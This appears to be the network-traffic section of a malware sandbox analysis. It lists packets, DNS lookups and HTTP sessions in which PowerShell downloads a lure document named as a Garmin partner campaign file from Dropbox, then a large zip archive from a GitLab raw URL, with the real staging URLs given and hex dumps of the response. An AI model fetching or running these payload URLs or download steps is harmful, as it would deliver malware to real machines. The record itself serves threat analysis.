                                                                                                                                                                                                                Dec 19, 2024 14:14:33.866312981 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:33.866321087 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:33.866357088 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.020484924 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.020508051 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.020673990 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.020699024 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.020745993 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.025926113 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.025940895 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.026022911 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.026031971 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.026073933 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.031980991 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.031997919 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.032090902 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.032097101 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.032145977 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.037111044 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.037127018 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.037220001 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.037228107 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.037269115 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.043339014 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.043354988 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.043414116 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.043420076 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.043450117 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.048135042 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.048151016 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.048217058 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.048243999 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.048285961 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.054289103 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.054305077 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.054369926 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.054375887 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.054411888 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.060378075 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.060451031 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.060461998 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.060504913 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.060506105 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.060543060 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.211457014 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.211498976 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.211656094 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.211678028 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.211718082 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.216954947 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.216984034 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.217087030 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.217097998 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.217137098 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.222985983 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.223007917 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.223074913 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.223086119 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.223130941 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.227284908 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.227338076 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.227350950 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.227358103 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.227381945 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.232537031 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.232557058 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.232629061 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.232637882 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.232675076 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.239217043 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.239234924 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.239269018 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.239276886 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.239298105 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.244498014 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.244514942 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.244704962 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.244714022 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.250523090 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.250544071 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.250601053 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.250610113 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.299814939 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.402894020 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.402920961 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.402986050 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.403000116 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.403023005 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.403038979 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.408138037 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.408155918 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.408220053 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.408226967 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.408272028 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.413773060 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:34.413790941 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                Dec 19, 2024 14:14:10.311235905 CET192.168.2.101.1.1.10xc8c2Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 19, 2024 14:14:12.997281075 CET192.168.2.101.1.1.10xe37cStandard query (0)uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 19, 2024 14:14:17.910315990 CET192.168.2.101.1.1.10xb278Standard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                Dec 19, 2024 14:14:10.449387074 CET1.1.1.1192.168.2.100xc8c2No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Dec 19, 2024 14:14:10.449387074 CET1.1.1.1192.168.2.100xc8c2No error (0)www-env.dropbox-dns.com162.125.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 19, 2024 14:14:13.309415102 CET1.1.1.1192.168.2.100xe37cNo error (0)uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                Dec 19, 2024 14:14:13.309415102 CET1.1.1.1192.168.2.100xe37cNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 19, 2024 14:14:18.047626972 CET1.1.1.1192.168.2.100xb278No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.333445072 CET1.1.1.1192.168.2.100x7a39No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.333445072 CET1.1.1.1192.168.2.100x7a39No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 19, 2024 14:14:39.660253048 CET1.1.1.1192.168.2.100x7660No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 19, 2024 14:14:39.660253048 CET1.1.1.1192.168.2.100x7660No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                0192.168.2.1049708162.125.69.184437732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-12-19 13:14:11 UTC192OUTGET /scl/fi/mfmemsox3eb9769rgrajn/Garmin_Campaign_Information_for_Partners_V11.docx?rlkey=oy421vwzu8dsedagxt4w0ddsw&st=31jc5byu&dl=1 HTTP/1.1
                                                                                                                                                                                                                Host: www.dropbox.com
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                2024-12-19 13:14:12 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://pap [TRUNCATED]
                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                Location: https://uce7538052cd98e23dd4ab202b67.dl.dropboxusercontent.com/cd/0/get/CghgEBbI7BWE-ZfTAruPVm3dHgMTWEXh0ab6rlLJi18c4YZGNW3-GxJt1ADNaGJqRSjivvxAmc0J00AIL1q0LlWpSeNB8eaclo-Nkc5aXjDcW1R4N76kxUQdgf1esoRPhibwvDluxu535pZqjef58UYF/file?dl=1#
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                Set-Cookie: gvc=OTgwNDQ4NjI0MjcyNjg1MTA4NjkzODA2MzQ0NDQzMzU3ODMxODM=; Path=/; Expires=Tue, 18 Dec 2029 13:14:12 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                Set-Cookie: t=pUjphARnQETCnYU5rMxFRwi-; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 13:14:12 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                Set-Cookie: __Host-js_csrf=pUjphARnQETCnYU5rMxFRwi-; Path=/; Expires=Fri, 19 Dec 2025 13:14:12 GMT; Secure; SameSite=None
                                                                                                                                                                                                                Set-Cookie: __Host-ss=68HSazBKug; Path=/; Expires=Fri, 19 Dec 2025 13:14:12 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 13:14:12 GMT
                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                Content-Length: 17
                                                                                                                                                                                                                Date: Thu, 19 Dec 2024 13:14:12 GMT
                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                Server: envoy
                                                                                                                                                                                                                Cache-Control: no-cache, no-store
                                                                                                                                                                                                                X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                X-Dropbox-Request-Id: c1c2b26a94634d929b8ed872e5b42000
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                2024-12-19 13:14:12 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                Data Ascii: ...status=302-->


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                1192.168.2.1049729172.65.251.784437056C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC97OUTGET /fgh8090051/jgh/-/raw/main/FGa1812.zip HTTP/1.1
                                                                                                                                                                                                                Host: gitlab.com
                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC453INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Thu, 19 Dec 2024 13:14:19 GMT
                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                Content-Length: 68976514
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                CF-Ray: 8f47a7b03c09728d-EWR
                                                                                                                                                                                                                CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                                Content-Disposition: attachment
                                                                                                                                                                                                                ETag: "9f57f909b1d98bfee8b260d2bf18a4c9"
                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC502INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 76 68 61 25 32 46 6b 62 58 52 77 4d 62 65 73 4a 79 79 72 64 6b 42 76 44 25 32 46 73 37 6a 34 6f 58 37 4b 58 53 65 70 74 70 55 25 32 42 5a 41 72 35 72 35 6b 49 6a 73 4f 78 79 65 61 78 47 4d 54 75 69 58 66 59 76 34 6a 70 25 32 42 58 68 59 69 63 4d 34 77 78 66 79 31 6f 7a 4c 31 7a 44 61 75 6d 39 32 34 6c 77 55 4f 66 30 7a 71 4c 31 74 77 6b 52 33 6f 4d 6f 58 6a 64 64 6e 32 64 35 76 6c 32 67 38 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c
                                                                                                                                                                                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vha%2FkbXRwMbesJyyrdkBvD%2Fs7j4oX7KXSeptpU%2BZAr5r5kIjsOxyeaxGMTuiXfYv4jp%2BXhYicM4wxfy1ozL1zDaum924lwUOf0zqL1twkR3oMoXjddn2d5vl2g8%3D"}],"group":"cf-nel","max_age":604800}NEL
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC1369INData Raw: 50 4b 03 04 14 00 00 00 08 00 5c b1 46 58 b9 e1 db da 47 27 00 00 0a 90 00 00 0b 00 00 00 4c 49 43 45 4e 53 45 2e 74 78 74 dc 5c 5d 73 db b8 92 7d 47 15 ff 03 4a 2f b1 eb d2 8c e5 4c 32 93 49 6d ed ca 12 6d f3 ae 2d 79 29 29 99 dc a7 4b 49 90 85 09 45 68 08 d2 1a cd af df ee 06 c0 0f 59 76 ec cc 57 ed 2a 55 8a 44 11 8d 46 a3 d1 7d 4e 03 74 2f e0 57 d1 78 32 8a 3f f3 d1 05 9f 5c 85 7c 3c ba 98 7c ea c5 a1 c7 fe e3 d1 97 c7 3c 76 bb 2b 56 2a e3 db 44 f3 79 2e 92 42 2c b8 cc 78 b1 12 5c 24 79 ba e3 dd f7 ef 4f 35 9f ed f8 65 29 17 8a df 27 19 8f 95 d6 e5 9a 27 05 1f 17 72 be 2a 64 76 e7 b1 9b 04 da ac 93 42 ea f9 8a f7 45 56 e4 70 cb 51 ff 53 e4 73 2d 04 5f 15 c5 46 ff f8 fa f5 76 bb 0d e6 5b 19 64 e9 b1 eb 67 28 e0 3d 4f 93 6c a1 3d 06 6a 24 5c 97 f3 b9 d0
                                                                                                                                                                                                                Data Ascii: PK\FXG'LICENSE.txt\]s}GJ/L2Imm-y))KIEhYvW*UDF}Nt/Wx2?\|<|<v+V*Dy.B,x\$yO5e)''r*dvBEVpQSs-_Fv[dg(=Ol=j$\
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC1369INData Raw: 87 7c 4a 97 6e 3f 4f ae 46 c3 a7 30 f1 b3 5e 0d e0 5c 39 0d 2e d2 85 9a 97 08 97 4c ea c6 ab 76 12 1b 2e e4 b1 27 00 c9 b5 9d f3 8f 76 41 9c d1 80 61 0e 73 5a 8b 64 7d db fc 4d f0 43 f0 ce e7 e2 d7 64 bd 49 71 dd 81 09 e5 06 3f a0 26 c6 a3 e7 0a a6 41 66 26 9d 3e 54 6e 81 e0 e3 a1 86 14 4b 1e 68 e2 31 87 11 ff 25 72 75 d2 27 0f e4 e7 e3 81 93 60 54 55 6b 51 db 04 7d c7 40 19 a2 15 85 72 ca 4b 6d bb 83 00 b0 14 39 22 4c b7 72 03 f4 a9 c6 42 36 56 d4 28 81 86 4f 63 5a 82 53 a3 41 9c ce 49 d1 d2 c2 63 66 a2 2b 16 04 9e 31 1d 0e 7a e8 25 fc 3a ea 87 43 f0 88 8f 61 3c c6 ef 30 b2 93 17 bc 50 7a 17 fc 0f 49 80 13 d5 bb 8c c3 f0 26 1c 4e 70 60 33 51 6c 11 ee 3c 8d 3d 21 60 74 c0 ce 9d 63 bf c2 de 51 b6 90 f7 92 26 05 a8 cf a8 01 2d f9 51 c7 ce 87 e8 1c f3 84 d8
                                                                                                                                                                                                                Data Ascii: |Jn?OF0^\9.Lv.'vAasZd}MCdIq?&Af&>TnKh1%ru'`TUkQ}@rKm9"LrB6V(OcZSAIcf+1z%:Ca<0PzI&Np`3Ql<=!`tcQ&-Q
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC1369INData Raw: ac 84 09 1a 83 8f 24 1c 30 79 9e f8 bc df e3 ef df 9e be ed 56 c8 d2 63 df 04 2d f7 a7 d0 63 6d 68 f9 14 9e e4 6d 38 e9 b1 36 fb 38 ea e0 34 3b a0 d0 39 fe 16 80 d9 2a 36 1f f0 0a df dd 61 13 e8 41 c4 79 52 43 4e 8f bd 0c 73 f2 c3 90 d3 63 2f c7 9c 7c 0f 72 b6 41 3d b1 e1 1a 55 fd 2e e4 f9 a0 4a ef ec 61 ea 1d 35 12 23 b7 71 7d fa cf e8 94 3f 05 c8 6c 97 35 cc 68 8f e8 25 60 c3 ae c4 bf 04 6f ec f7 f5 37 42 8e e6 9e de 0b 81 c7 77 81 1b c8 b7 61 0f f8 e6 b1 06 93 fe 1d 08 04 96 e7 98 37 11 08 61 0b bf 06 22 78 63 13 8a b4 c6 ed 5b 05 3d f6 07 80 8f b7 7f 2d f8 78 1c eb 54 88 e3 4e c1 52 ca cc 02 a2 10 9a 81 34 58 55 76 4f 16 ee 42 fc 81 9b 4b 85 76 99 12 8b 81 76 2b 68 5c a0 7e f0 a5 9f a4 12 22 51 26 13 2c 0f 21 57 c0 15 07 fa 2c 21 0e 15 c4 0a b0 19 85
                                                                                                                                                                                                                Data Ascii: $0yVc-cmhm8684;9*6aAyRCNsc/|rA=U.Ja5#q}?l5h%`o7Bwa7a"xc[=-xTNR4XUvOBKvv+h\~"Q&,!W,!
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC1369INData Raw: ae e0 7a 9c e6 88 18 e0 b3 2b aa ed de f4 00 39 c0 5b 34 ee 5f 71 70 eb 49 3c bd e1 0d 40 78 7d dd 80 9e 00 d3 26 57 80 76 2e 7b 80 ca 26 23 f0 ae ab 68 dc 28 0d 03 86 ba 9e 0e 50 2c b6 b3 d0 b4 d9 fe 00 80 24 04 6a 21 24 4a 40 54 8a 78 67 62 d1 dd 57 54 ad 80 5f 0d 3f 2b f4 16 0d 07 51 1c f6 27 4f c2 38 6c 61 bf 7a ec 13 60 d4 f1 08 ba 8f 2d a6 c3 7e 2f e2 d1 8d 41 7b 54 2c 87 71 0e 7a 93 1e b6 bd 8d 47 a0 39 a8 fd e9 2a 44 00 86 ea f7 00 59 f6 fa 06 3a 5f 60 b7 93 18 be fa 7c 18 5e 5e 47 97 e1 b0 1f 56 58 10 4c 08 40 79 34 05 33 f7 0d 38 ef c5 91 39 36 39 9d 00 20 bc e0 23 12 09 42 86 21 dd 61 26 a0 02 d1 a0 41 18 c3 b0 6f 7a 24 f6 82 b7 e6 83 66 fa 5f 61 3c 3a 81 c9 c4 fb f1 a0 a0 8b 5d 17 64 93 41 88 f2 51 9e 8d 5e 83 51 7f 7a e3 b0 ff b7 44 ae 43 af
                                                                                                                                                                                                                Data Ascii: z+9[4_qpI<@x}&Wv.{&#h(P,$j!$J@TxgbWT_?+Q'O8laz`-~/A{T,qzG9*DY:_`|^^GVXL@y438969 #B!a&Aoz$f_a<:]dAQ^QzDC
                                                                                                                                                                                                                2024-12-19 13:14:19 UTC1369INData Raw: 21 f2 21 9f 44 db 66 ec ab b4 df f1 1e c3 67 0e ec 1a 31 54 de 91 31 da e3 7a 19 41 62 8e 0c d5 b4 e8 e0 2e 4f f8 53 08 3a f7 e2 cf 0f 69 13 73 3c e9 e8 2b 23 07 03 f7 a7 b1 a9 06 c2 70 c7 d3 f3 f1 24 9a 4c 27 21 bb 1c 8d 06 44 bb c6 61 fc 11 d8 f7 f8 c3 c3 62 82 df a0 56 1f f0 f3 39 6e 11 e1 3c 44 c3 49 18 c7 d3 5b e4 42 c7 fc 6a f4 89 a8 5a 1f f9 fc 80 8c 38 1a da 9d b2 d0 fe e5 91 eb c8 da d8 67 0d 8e 56 d3 32 dc 95 ea 4f 1a b7 f1 91 a1 65 8d 31 b2 16 77 ab 77 ae 8e 2b ba 16 99 6e 69 c7 d1 30 b7 d6 41 c9 68 cc 9c fb 3d 6b fb 8a 4c d6 bf b2 b4 14 3c d8 66 05 93 13 7c fe b3 a6 0f ff 95 cc d7 f8 b7 12 18 e5 9b d7 2e f1 54 e7 5f bb c1 69 f0 03 ae c4 ee 1b cc 2b 3b 3a de f3 87 e6 46 ca ee cb a5 e4 27 fc 41 81 16 13 da d9 19 e7 bd 0c 53 fc 8e 5f 02 b4 cd 7c
                                                                                                                                                                                                                Data Ascii: !!Dfg1T1zAb.OS:is<+#p$L'!DabV9n<DI[BjZ8gV2Oe1ww+ni0Ah=kL<f|.T_i+;:F'AS_|
